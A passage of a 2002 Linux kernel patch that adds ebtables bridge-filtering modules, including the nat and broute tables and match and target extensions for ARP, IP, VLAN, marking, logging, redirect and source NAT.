ebt_unregister_table(&frame_filter); + return ret; +} + +static void __exit fini(void) +{ + int i; + + for (i = 0; i < sizeof(ebt_ops_filter) / sizeof(ebt_ops_filter[0]); i++) + nf_unregister_hook(&ebt_ops_filter[i]); + ebt_unregister_table(&frame_filter); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebtable_nat.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,96 @@ +/* + * ebtable_nat + * + * Authors: + * Bart De Schuymer + * + * April, 2002 + * + */ + +#include +#include +#define NAT_VALID_HOOKS ((1 << NF_BR_PRE_ROUTING) | (1 << NF_BR_LOCAL_OUT) | \ + (1 << NF_BR_POST_ROUTING)) + +static struct ebt_entries initial_chains[] = +{ + {0, "PREROUTING", 0, EBT_ACCEPT, 0}, + {0, "OUTPUT", 0, EBT_ACCEPT, 0}, + {0, "POSTROUTING", 0, EBT_ACCEPT, 0} +}; + +static struct ebt_replace initial_table = +{ + "nat", NAT_VALID_HOOKS, 0, 3 * sizeof(struct ebt_entries), + { [NF_BR_PRE_ROUTING]&initial_chains[0], [NF_BR_LOCAL_OUT]&initial_chains[1], + [NF_BR_POST_ROUTING]&initial_chains[2] }, 0, NULL, (char *)initial_chains +}; + +static int check(const struct ebt_table_info *info, unsigned int valid_hooks) +{ + if (valid_hooks & ~NAT_VALID_HOOKS) + return -EINVAL; + return 0; +} + +static struct ebt_table frame_nat = +{ + {NULL, NULL}, "nat", &initial_table, NAT_VALID_HOOKS, + RW_LOCK_UNLOCKED, check, NULL +}; + +static unsigned int +ebt_nat_dst(unsigned int hook, struct sk_buff **pskb, const struct net_device *in + , const struct net_device *out, int (*okfn)(struct sk_buff *)) +{ + return ebt_do_table(hook, pskb, in, out, &frame_nat); +} + +static unsigned int +ebt_nat_src(unsigned int hook, struct sk_buff **pskb, const struct net_device *in + , const struct net_device *out, int (*okfn)(struct sk_buff *)) +{ + return ebt_do_table(hook, pskb, in, out, &frame_nat); +} + +static struct nf_hook_ops ebt_ops_nat[] = { + { { NULL, NULL }, ebt_nat_dst, PF_BRIDGE, 
NF_BR_LOCAL_OUT, + NF_BR_PRI_NAT_DST_OTHER}, + { { NULL, NULL }, ebt_nat_src, PF_BRIDGE, NF_BR_POST_ROUTING, + NF_BR_PRI_NAT_SRC}, + { { NULL, NULL }, ebt_nat_dst, PF_BRIDGE, NF_BR_PRE_ROUTING, + NF_BR_PRI_NAT_DST_BRIDGED}, +}; + +static int __init init(void) +{ + int i, ret, j; + + ret = ebt_register_table(&frame_nat); + if (ret < 0) + return ret; + for (i = 0; i < sizeof(ebt_ops_nat) / sizeof(ebt_ops_nat[0]); i++) + if ((ret = nf_register_hook(&ebt_ops_nat[i])) < 0) + goto cleanup; + return ret; +cleanup: + for (j = 0; j < i; j++) + nf_unregister_hook(&ebt_ops_nat[j]); + ebt_unregister_table(&frame_nat); + return ret; +} + +static void __exit fini(void) +{ + int i; + + for (i = 0; i < sizeof(ebt_ops_nat) / sizeof(ebt_ops_nat[0]); i++) + nf_unregister_hook(&ebt_ops_nat[i]); + ebt_unregister_table(&frame_nat); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebtable_broute.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,75 @@ +/* + * ebtable_broute + * + * Authors: + * Bart De Schuymer + * + * April, 2002 + * + * This table lets you choose between routing and bridging for frames + * entering on a bridge enslaved nic. This table is traversed before any + * other ebtables table. See net/bridge/br_input.c. 
+ */ + +#include +#include +#include +#include + +// EBT_ACCEPT means the frame will be bridged +// EBT_DROP means the frame will be routed +static struct ebt_entries initial_chain = + {0, "BROUTING", 0, EBT_ACCEPT, 0}; + +static struct ebt_replace initial_table = +{ + "broute", 1 << NF_BR_BROUTING, 0, sizeof(struct ebt_entries), + { [NF_BR_BROUTING]&initial_chain}, 0, NULL, (char *)&initial_chain +}; + +static int check(const struct ebt_table_info *info, unsigned int valid_hooks) +{ + if (valid_hooks & ~(1 << NF_BR_BROUTING)) + return -EINVAL; + return 0; +} + +static struct ebt_table broute_table = +{ + {NULL, NULL}, "broute", &initial_table, 1 << NF_BR_BROUTING, + RW_LOCK_UNLOCKED, check, NULL +}; + +static unsigned int +ebt_broute(unsigned int hook, struct sk_buff **pskb, const struct net_device *in, + const struct net_device *out, int (*okfn)(struct sk_buff *)) +{ + return ebt_do_table(hook, pskb, in, out, &broute_table); +} + +static int __init init(void) +{ + int ret; + + ret = ebt_register_table(&broute_table); + if (ret < 0) + return ret; + br_write_lock_bh(BR_NETPROTO_LOCK); + // in br_input.c, br_handle_frame() wants to call broute_decision() + broute_decision = ebt_broute; + br_write_unlock_bh(BR_NETPROTO_LOCK); + return ret; +} + +static void __exit fini(void) +{ + br_write_lock_bh(BR_NETPROTO_LOCK); + broute_decision = NULL; + br_write_unlock_bh(BR_NETPROTO_LOCK); + ebt_unregister_table(&broute_table); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_mark.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,66 @@ +/* + * ebt_mark + * + * Authors: + * Bart De Schuymer + * + * July, 2002 + * + */ + +// The mark target can be used in any chain +// I believe adding a mangle table just for marking is total overkill +// Marking a frame doesn't really change anything in the frame anyway + +#include +#include +#include + +static int 
ebt_target_mark(struct sk_buff **pskb, unsigned int hooknr, + const struct net_device *in, const struct net_device *out, + const void *data, unsigned int datalen) +{ + struct ebt_mark_t_info *info = (struct ebt_mark_t_info *)data; + + if ((*pskb)->nfmark != info->mark) { + (*pskb)->nfmark = info->mark; + (*pskb)->nfcache |= NFC_ALTERED; + } + return info->target; +} + +static int ebt_target_mark_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct ebt_mark_t_info *info = (struct ebt_mark_t_info *)data; + + if (datalen != sizeof(struct ebt_mark_t_info)) + return -EINVAL; + if (BASE_CHAIN && info->target == EBT_RETURN) + return -EINVAL; + CLEAR_BASE_CHAIN_BIT; + if (INVALID_TARGET) + return -EINVAL; + return 0; +} + +static struct ebt_target mark_target = +{ + {NULL, NULL}, EBT_MARK_TARGET, ebt_target_mark, + ebt_target_mark_check, NULL, THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_target(&mark_target); +} + +static void __exit fini(void) +{ + ebt_unregister_target(&mark_target); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_mark_m.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,61 @@ +/* + * ebt_mark_m + * + * Authors: + * Bart De Schuymer + * + * July, 2002 + * + */ + +#include +#include +#include + +static int ebt_filter_mark(const struct sk_buff *skb, + const struct net_device *in, const struct net_device *out, const void *data, + unsigned int datalen) +{ + struct ebt_mark_m_info *info = (struct ebt_mark_m_info *) data; + + if (info->bitmask & EBT_MARK_OR) + return !(!!(skb->nfmark & info->mask) ^ info->invert); + return !(((skb->nfmark & info->mask) == info->mark) ^ info->invert); +} + +static int ebt_mark_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct 
ebt_mark_m_info *info = (struct ebt_mark_m_info *) data; + + if (datalen != sizeof(struct ebt_mark_m_info)) + return -EINVAL; + if (info->bitmask & ~EBT_MARK_MASK) + return -EINVAL; + if ((info->bitmask & EBT_MARK_OR) && (info->bitmask & EBT_MARK_AND)) + return -EINVAL; + if (!info->bitmask) + return -EINVAL; + return 0; +} + +static struct ebt_match filter_mark = +{ + {NULL, NULL}, EBT_MARK_MATCH, ebt_filter_mark, ebt_mark_check, NULL, + THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_match(&filter_mark); +} + +static void __exit fini(void) +{ + ebt_unregister_match(&filter_mark); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_redirect.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,71 @@ +/* + * ebt_redirect + * + * Authors: + * Bart De Schuymer + * + * April, 2002 + * + */ + +#include +#include +#include +#include +#include "../br_private.h" + +static int ebt_target_redirect(struct sk_buff **pskb, unsigned int hooknr, + const struct net_device *in, const struct net_device *out, + const void *data, unsigned int datalen) +{ + struct ebt_redirect_info *info = (struct ebt_redirect_info *)data; + + if (hooknr != NF_BR_BROUTING) + memcpy((**pskb).mac.ethernet->h_dest, + in->br_port->br->dev.dev_addr, ETH_ALEN); + else { + memcpy((**pskb).mac.ethernet->h_dest, + in->dev_addr, ETH_ALEN); + (*pskb)->pkt_type = PACKET_HOST; + } + return info->target; +} + +static int ebt_target_redirect_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct ebt_redirect_info *info = (struct ebt_redirect_info *)data; + + if (datalen != sizeof(struct ebt_redirect_info)) + return -EINVAL; + if (BASE_CHAIN && info->target == EBT_RETURN) + return -EINVAL; + CLEAR_BASE_CHAIN_BIT; + if ( (strcmp(tablename, "nat") || hookmask & ~(1 << NF_BR_PRE_ROUTING)) && + (strcmp(tablename, 
"broute") || hookmask & ~(1 << NF_BR_BROUTING)) ) + return -EINVAL; + if (INVALID_TARGET) + return -EINVAL; + return 0; +} + +static struct ebt_target redirect_target = +{ + {NULL, NULL}, EBT_REDIRECT_TARGET, ebt_target_redirect, + ebt_target_redirect_check, NULL, THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_target(&redirect_target); +} + +static void __exit fini(void) +{ + ebt_unregister_target(&redirect_target); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_arp.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,102 @@ +/* + * ebt_arp + * + * Authors: + * Bart De Schuymer + * Tim Gardner + * + * April, 2002 + * + */ + +#include +#include +#include +#include + +static int ebt_filter_arp(const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out, const void *data, unsigned int datalen) +{ + struct ebt_arp_info *info = (struct ebt_arp_info *)data; + + if (info->bitmask & EBT_ARP_OPCODE && FWINV(info->opcode != + ((*skb).nh.arph)->ar_op, EBT_ARP_OPCODE)) + return EBT_NOMATCH; + if (info->bitmask & EBT_ARP_HTYPE && FWINV(info->htype != + ((*skb).nh.arph)->ar_hrd, EBT_ARP_HTYPE)) + return EBT_NOMATCH; + if (info->bitmask & EBT_ARP_PTYPE && FWINV(info->ptype != + ((*skb).nh.arph)->ar_pro, EBT_ARP_PTYPE)) + return EBT_NOMATCH; + + if (info->bitmask & (EBT_ARP_SRC_IP | EBT_ARP_DST_IP)) + { + uint32_t arp_len = sizeof(struct arphdr) + + (2 * (((*skb).nh.arph)->ar_hln)) + + (2 * (((*skb).nh.arph)->ar_pln)); + uint32_t dst; + uint32_t src; + + // Make sure the packet is long enough. + if ((((*skb).nh.raw) + arp_len) > (*skb).tail) + return EBT_NOMATCH; + // IPv4 addresses are always 4 bytes. 
+ if (((*skb).nh.arph)->ar_pln != sizeof(uint32_t)) + return EBT_NOMATCH; + + if (info->bitmask & EBT_ARP_SRC_IP) { + memcpy(&src, ((*skb).nh.raw) + sizeof(struct arphdr) + + ((*skb).nh.arph)->ar_hln, sizeof(uint32_t)); + if (FWINV(info->saddr != (src & info->smsk), + EBT_ARP_SRC_IP)) + return EBT_NOMATCH; + } + + if (info->bitmask & EBT_ARP_DST_IP) { + memcpy(&dst, ((*skb).nh.raw)+sizeof(struct arphdr) + + (2*(((*skb).nh.arph)->ar_hln)) + + (((*skb).nh.arph)->ar_pln), sizeof(uint32_t)); + if (FWINV(info->daddr != (dst & info->dmsk), + EBT_ARP_DST_IP)) + return EBT_NOMATCH; + } + } + return EBT_MATCH; +} + +static int ebt_arp_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct ebt_arp_info *info = (struct ebt_arp_info *)data; + + if (datalen != sizeof(struct ebt_arp_info)) + return -EINVAL; + if ((e->ethproto != __constant_htons(ETH_P_ARP) && + e->ethproto != __constant_htons(ETH_P_RARP)) || + e->invflags & EBT_IPROTO) + return -EINVAL; + if (info->bitmask & ~EBT_ARP_MASK || info->invflags & ~EBT_ARP_MASK) + return -EINVAL; + return 0; +} + +static struct ebt_match filter_arp = +{ + {NULL, NULL}, EBT_ARP_MATCH, ebt_filter_arp, ebt_arp_check, NULL, + THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_match(&filter_arp); +} + +static void __exit fini(void) +{ + ebt_unregister_match(&filter_arp); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_ip.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,73 @@ +/* + * ebt_ip + * + * Authors: + * Bart De Schuymer + * + * April, 2002 + * + */ + +#include +#include +#include +#include + +static int ebt_filter_ip(const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out, const void *data, + unsigned int datalen) +{ + struct ebt_ip_info *info = (struct ebt_ip_info *)data; + + if 
(info->bitmask & EBT_IP_TOS && + FWINV(info->tos != ((*skb).nh.iph)->tos, EBT_IP_TOS)) + return EBT_NOMATCH; + if (info->bitmask & EBT_IP_PROTO && FWINV(info->protocol != + ((*skb).nh.iph)->protocol, EBT_IP_PROTO)) + return EBT_NOMATCH; + if (info->bitmask & EBT_IP_SOURCE && + FWINV((((*skb).nh.iph)->saddr & info->smsk) != + info->saddr, EBT_IP_SOURCE)) + return EBT_NOMATCH; + if ((info->bitmask & EBT_IP_DEST) && + FWINV((((*skb).nh.iph)->daddr & info->dmsk) != + info->daddr, EBT_IP_DEST)) + return EBT_NOMATCH; + return EBT_MATCH; +} + +static int ebt_ip_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct ebt_ip_info *info = (struct ebt_ip_info *)data; + + if (datalen != sizeof(struct ebt_ip_info)) + return -EINVAL; + if (e->ethproto != __constant_htons(ETH_P_IP) || + e->invflags & EBT_IPROTO) + return -EINVAL; + if (info->bitmask & ~EBT_IP_MASK || info->invflags & ~EBT_IP_MASK) + return -EINVAL; + return 0; +} + +static struct ebt_match filter_ip = +{ + {NULL, NULL}, EBT_IP_MATCH, ebt_filter_ip, ebt_ip_check, NULL, + THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_match(&filter_ip); +} + +static void __exit fini(void) +{ + ebt_unregister_match(&filter_ip); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_vlan.c Wed Sep 11 23:56:37 2002 @@ -0,0 +1,318 @@ +/* + * Description: EBTables 802.1Q match extension kernelspace module. + * Authors: Nick Fedchik + * Bart De Schuymer + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. 
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
+ */
+
+#include
+#include
+#include
+#include
+#include
+
+static unsigned char debug;
+#define MODULE_VERSION "0.4 (" __DATE__ " " __TIME__ ")"
+
+MODULE_PARM (debug, "0-1b");
+MODULE_PARM_DESC (debug, "debug=1 is turn on debug messages");
+MODULE_AUTHOR ("Nick Fedchik ");
+MODULE_DESCRIPTION ("802.1Q match module (ebtables extension), v"
+		    MODULE_VERSION);
+MODULE_LICENSE ("GPL");
+
+
+#define DEBUG_MSG(...) if (debug) printk (KERN_DEBUG __FILE__ ":" __VA_ARGS__)
+#define INV_FLAG(_inv_flag_) (info->invflags & _inv_flag_) ? "!" : ""
+#define GET_BITMASK(_BIT_MASK_) info->bitmask & _BIT_MASK_
+#define SET_BITMASK(_BIT_MASK_) info->bitmask |= _BIT_MASK_
+#define EXIT_ON_MISMATCH(_MATCH_,_MASK_) if (!((info->_MATCH_ == _MATCH_)^!!(info->invflags & _MASK_))) return 1;
+
+/*
+ * Function description: ebt_filter_vlan() is the main engine for
+ * checking a passed 802.1Q frame against
+ * the passed extension parameters (in the *data buffer).
+ * ebt_filter_vlan() is called after the rule params have been
+ * successfully checked by the ebt_check_vlan() function.
+ * Parameters: + * const struct sk_buff *skb - pointer to passed ethernet frame buffer + * const void *data - pointer to passed extension parameters + * unsigned int datalen - length of passed *data buffer + * const struct net_device *in - + * const struct net_device *out - + * const struct ebt_counter *c - + * Returned values: + * 0 - ok (all rule params matched) + * 1 - miss (rule params not acceptable to the parsed frame) + */ +static int +ebt_filter_vlan (const struct sk_buff *skb, + const struct net_device *in, + const struct net_device *out, + const void *data, + unsigned int datalen) +{ + struct ebt_vlan_info *info = (struct ebt_vlan_info *) data; /* userspace data */ + struct vlan_ethhdr *frame = (struct vlan_ethhdr *) skb->mac.raw; /* Passed tagged frame */ + + unsigned short TCI; /* Whole TCI, given from parsed frame */ + unsigned short id; /* VLAN ID, given from frame TCI */ + unsigned char prio; /* user_priority, given from frame TCI */ + unsigned short encap; /* VLAN encapsulated Type/Length field, given from orig frame */ + + /* + * Tag Control Information (TCI) consists of the following elements: + * - User_priority. This field allows the tagged frame to carry user_priority + * information across Bridged LANs in which individual LAN segments may be unable to signal + * priority information (e.g., 802.3/Ethernet segments). + * The user_priority field is three bits in length, + * interpreted as a binary number. The user_priority is therefore + * capable of representing eight priority levels, 0 through 7. + * The use and interpretation of this field is defined in ISO/IEC 15802-3. + * - Canonical Format Indicator (CFI). This field is used, + * in 802.3/Ethernet, to signal the presence or absence + * of a RIF field, and, in combination with the Non-canonical Format Indicator (NCFI) carried + * in the RIF, to signal the bit order of address information carried in the encapsulated + * frame. The Canonical Format Indicator (CFI) is a single bit flag value. 
+	 * - VLAN Identifier (VID). This field uniquely identifies the VLAN to
+	 * which the frame belongs. The twelve-bit VLAN Identifier (VID) field
+	 * uniquely identifies the VLAN to which the frame belongs.
+	 * The VID is encoded as an unsigned binary number.
+	 */
+	TCI = ntohs (frame->h_vlan_TCI);
+	id = TCI & 0xFFF;
+	prio = TCI >> 13;
+	encap = frame->h_vlan_encapsulated_proto;
+
+	/*
+	 * First step is to check whether the null VLAN ID is present
+	 * in the parsed frame
+	 */
+	if (!(id)) {
+		/*
+		 * Checking VLAN Identifier (VID)
+		 */
+		if (GET_BITMASK (EBT_VLAN_ID)) {	/* Is VLAN ID parsed? */
+			EXIT_ON_MISMATCH (id, EBT_VLAN_ID);
+			DEBUG_MSG
+			    ("matched rule id=%s%d for frame id=%d\n",
+			     INV_FLAG (EBT_VLAN_ID), info->id, id);
+		}
+	} else {
+		/*
+		 * Checking user_priority
+		 */
+		if (GET_BITMASK (EBT_VLAN_PRIO)) {	/* Is VLAN user_priority parsed? */
+			EXIT_ON_MISMATCH (prio, EBT_VLAN_PRIO);
+			DEBUG_MSG
+			    ("matched rule prio=%s%d for frame prio=%d\n",
+			     INV_FLAG (EBT_VLAN_PRIO), info->prio,
+			     prio);
+		}
+	}
+	/*
+	 * Checking Encapsulated Proto (Length/Type) field
+	 */
+	if (GET_BITMASK (EBT_VLAN_ENCAP)) {	/* Is VLAN Encap parsed? */
+		EXIT_ON_MISMATCH (encap, EBT_VLAN_ENCAP);
+		DEBUG_MSG ("matched encap=%s%2.4X for frame encap=%2.4X\n",
+			   INV_FLAG (EBT_VLAN_ENCAP),
+			   ntohs (info->encap), ntohs (encap));
+	}
+	/*
+	 * All possible extension parameters were checked.
+	 * If the rule never returned on a mismatch, then all is ok.
+	 */
+	return 0;
+}
+
+/*
+ * Function description: ebt_check_vlan() is called when userspace
+ * delivers the table to the kernel,
+ * to check that userspace doesn't give a bad table.
+ * Parameters:
+ * const char *tablename - table name string
+ * unsigned int hooknr - hook number
+ * const struct ebt_entry *e - ebtables entry basic set
+ * void *data - pointer to passed extension parameters
+ * unsigned int datalen - length of passed *data buffer
+ * Returned values:
+ * 0 - ok (all delivered rule params are correct)
+ * -EINVAL - miss (rule params are out of range, invalid, incompatible, etc.)
+ */
+static int
+ebt_check_vlan (const char *tablename,
+		unsigned int hooknr,
+		const struct ebt_entry *e, void *data,
+		unsigned int datalen)
+{
+	struct ebt_vlan_info *info = (struct ebt_vlan_info *) data;
+
+	/*
+	 * Parameters buffer overflow check
+	 */
+	if (datalen != sizeof (struct ebt_vlan_info)) {
+		DEBUG_MSG
+		    ("params size %d is not eq to ebt_vlan_info (%d)\n",
+		     datalen, sizeof (struct ebt_vlan_info));
+		return -EINVAL;
+	}
+
+	/*
+	 * Is the rule checking 802.1Q frames?
+	 */
+	if (e->ethproto != __constant_htons (ETH_P_8021Q)) {
+		DEBUG_MSG ("passed entry proto %2.4X is not 802.1Q (8100)\n",
+			   (unsigned short) ntohs (e->ethproto));
+		return -EINVAL;
+	}
+
+	/*
+	 * Check for bitmask range
+	 * True if even one bit is out of mask
+	 */
+	if (info->bitmask & ~EBT_VLAN_MASK) {
+		DEBUG_MSG ("bitmask %2X is out of mask (%2X)\n",
+			   info->bitmask, EBT_VLAN_MASK);
+		return -EINVAL;
+	}
+
+	/*
+	 * Check for inversion flags range
+	 */
+	if (info->invflags & ~EBT_VLAN_MASK) {
+		DEBUG_MSG ("inversion flags %2X is out of mask (%2X)\n",
+			   info->invflags, EBT_VLAN_MASK);
+		return -EINVAL;
+	}
+
+	/*
+	 * Reserved VLAN ID (VID) values
+	 * -----------------------------
+	 * 0 - The null VLAN ID. Indicates that the tag header contains only user_priority information;
+	 * no VLAN identifier is present in the frame. This VID value shall not be
+	 * configured as a PVID, configured in any Filtering Database entry, or used in any
+	 * Management operation.
+	 *
+	 * 1 - The default Port VID (PVID) value used for classifying frames on ingress through a Bridge
+	 * Port.
The PVID value can be changed by management on a per-Port basis. + * + * 0x0FFF - Reserved for implementation use. This VID value shall not be configured as a + * PVID or transmitted in a tag header. + * + * The remaining values of VID are available for general use as VLAN identifiers. + * A Bridge may implement the ability to support less than the full range of VID values; + * i.e., for a given implementation, + * an upper limit, N, is defined for the VID values supported, where N is less than or equal to 4094. + * All implementations shall support the use of all VID values in the range 0 through their defined maximum + * VID, N. + * + * For Linux, N = 4094. + */ + if (GET_BITMASK (EBT_VLAN_ID)) { /* when vlan-id param was spec-ed */ + if (!!info->id) { /* if id!=0 => check vid range */ + if (info->id > 4094) { /* check if id > than (0x0FFE) */ + DEBUG_MSG + ("vlan id %d is out of range (1-4094)\n", + info->id); + return -EINVAL; + } + /* + * Note: This is valid VLAN-tagged frame point. + * Any value of user_priority are acceptable, but could be ignored + * according to 802.1Q Std. + */ + } else { + /* + * if id=0 (null VLAN ID) => Check for user_priority range + */ + if (GET_BITMASK (EBT_VLAN_PRIO)) { + if ((unsigned char) info->prio > 7) { + DEBUG_MSG + ("prio %d is out of range (0-7)\n", + info->prio); + return -EINVAL; + } + } + /* + * Note2: This is valid priority-tagged frame point + * with null VID field. + */ + } + } else { /* VLAN Id not set */ + if (GET_BITMASK (EBT_VLAN_PRIO)) { /* But user_priority is set - abnormal! */ + info->id = 0; /* Set null VID (case for Priority-tagged frames) */ + SET_BITMASK (EBT_VLAN_ID); /* and set id flag */ + } + } + /* + * Check for encapsulated proto range - it is possible to be any value for u_short range. + * When relaying a tagged frame between 802.3/Ethernet MACs, + * a Bridge may adjust the padding field such that + * the minimum size of a transmitted tagged frame is 68 octets (7.2). 
+ * if_ether.h: ETH_ZLEN 60 - Min. octets in frame sans FCS + */ + if (GET_BITMASK (EBT_VLAN_ENCAP)) { + if ((unsigned short) ntohs (info->encap) < ETH_ZLEN) { + DEBUG_MSG + ("encap packet length %d is less than minimal %d\n", + ntohs (info->encap), ETH_ZLEN); + return -EINVAL; + } + } + + /* + * Otherwise is all correct + */ + DEBUG_MSG ("802.1Q tagged frame checked (%s table, %d hook)\n", + tablename, hooknr); + return 0; +} + +static struct ebt_match filter_vlan = { + {NULL, NULL}, + EBT_VLAN_MATCH, + ebt_filter_vlan, + ebt_check_vlan, + NULL, + THIS_MODULE +}; + +/* + * Module initialization function. + * Called when module is loaded to kernelspace + */ +static int __init init (void) +{ + DEBUG_MSG ("ebtables 802.1Q extension module v" + MODULE_VERSION "\n"); + DEBUG_MSG ("module debug=%d\n", !!debug); + return ebt_register_match (&filter_vlan); +} + +/* + * Module "finalization" function + * Called when download module from kernelspace + */ +static void __exit fini (void) +{ + ebt_unregister_match (&filter_vlan); +} + +module_init (init); +module_exit (fini); + +EXPORT_NO_SYMBOLS; --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_log.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,100 @@ +/* + * ebt_log + * + * Authors: + * Bart De Schuymer + * + * April, 2002 + * + */ + +#include +#include +#include +#include +#include +#include + +static spinlock_t ebt_log_lock = SPIN_LOCK_UNLOCKED; + +static int ebt_log_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct ebt_log_info *info = (struct ebt_log_info *)data; + + if (datalen != sizeof(struct ebt_log_info)) + return -EINVAL; + if (info->bitmask & ~EBT_LOG_MASK) + return -EINVAL; + if (info->loglevel >= 8) + return -EINVAL; + info->prefix[EBT_LOG_PREFIX_SIZE - 1] = '\0'; + return 0; +} + +static void ebt_log(const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out, const void *data, 
unsigned int datalen) +{ + struct ebt_log_info *info = (struct ebt_log_info *)data; + char level_string[4] = "< >"; + level_string[1] = '0' + info->loglevel; + + spin_lock_bh(&ebt_log_lock); + printk(level_string); + printk("%s IN=%s OUT=%s ", info->prefix, in ? in->name : "", + out ? out->name : ""); + + if (skb->dev->hard_header_len) { + int i; + unsigned char *p = (skb->mac.ethernet)->h_source; + + printk("MAC source = "); + for (i = 0; i < ETH_ALEN; i++,p++) + printk("%02x%c", *p, i == ETH_ALEN - 1 ? ' ':':'); + printk("MAC dest = "); + p = (skb->mac.ethernet)->h_dest; + for (i = 0; i < ETH_ALEN; i++,p++) + printk("%02x%c", *p, i == ETH_ALEN - 1 ? ' ':':'); + } + printk("proto = 0x%04x", ntohs(((*skb).mac.ethernet)->h_proto)); + + if ((info->bitmask & EBT_LOG_IP) && skb->mac.ethernet->h_proto == + htons(ETH_P_IP)){ + struct iphdr *iph = skb->nh.iph; + printk(" IP SRC=%u.%u.%u.%u IP DST=%u.%u.%u.%u,", + NIPQUAD(iph->saddr), NIPQUAD(iph->daddr)); + printk(" IP tos=0x%02X, IP proto=%d", iph->tos, iph->protocol); + } + + if ((info->bitmask & EBT_LOG_ARP) && + ((skb->mac.ethernet->h_proto == __constant_htons(ETH_P_ARP)) || + (skb->mac.ethernet->h_proto == __constant_htons(ETH_P_RARP)))) { + struct arphdr * arph = skb->nh.arph; + printk(" ARP HTYPE=%d, PTYPE=0x%04x, OPCODE=%d", + ntohs(arph->ar_hrd), ntohs(arph->ar_pro), + ntohs(arph->ar_op)); + } + printk("\n"); + spin_unlock_bh(&ebt_log_lock); +} + +struct ebt_watcher log = +{ + {NULL, NULL}, EBT_LOG_WATCHER, ebt_log, ebt_log_check, NULL, + THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_watcher(&log); +} + +static void __exit fini(void) +{ + ebt_unregister_watcher(&log); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_snat.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,64 @@ +/* + * ebt_snat + * + * Authors: + * Bart De Schuymer + * + * June, 2002 + * + */ + +#include 
+#include +#include + +static int ebt_target_snat(struct sk_buff **pskb, unsigned int hooknr, + const struct net_device *in, const struct net_device *out, + const void *data, unsigned int datalen) +{ + struct ebt_nat_info *info = (struct ebt_nat_info *) data; + + memcpy(((**pskb).mac.ethernet)->h_source, info->mac, + ETH_ALEN * sizeof(unsigned char)); + return info->target; +} + +static int ebt_target_snat_check(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *data, unsigned int datalen) +{ + struct ebt_nat_info *info = (struct ebt_nat_info *) data; + + if (datalen != sizeof(struct ebt_nat_info)) + return -EINVAL; + if (BASE_CHAIN && info->target == EBT_RETURN) + return -EINVAL; + CLEAR_BASE_CHAIN_BIT; + if (strcmp(tablename, "nat")) + return -EINVAL; + if (hookmask & ~(1 << NF_BR_POST_ROUTING)) + return -EINVAL; + if (INVALID_TARGET) + return -EINVAL; + return 0; +} + +static struct ebt_target snat = +{ + {NULL, NULL}, EBT_SNAT_TARGET, 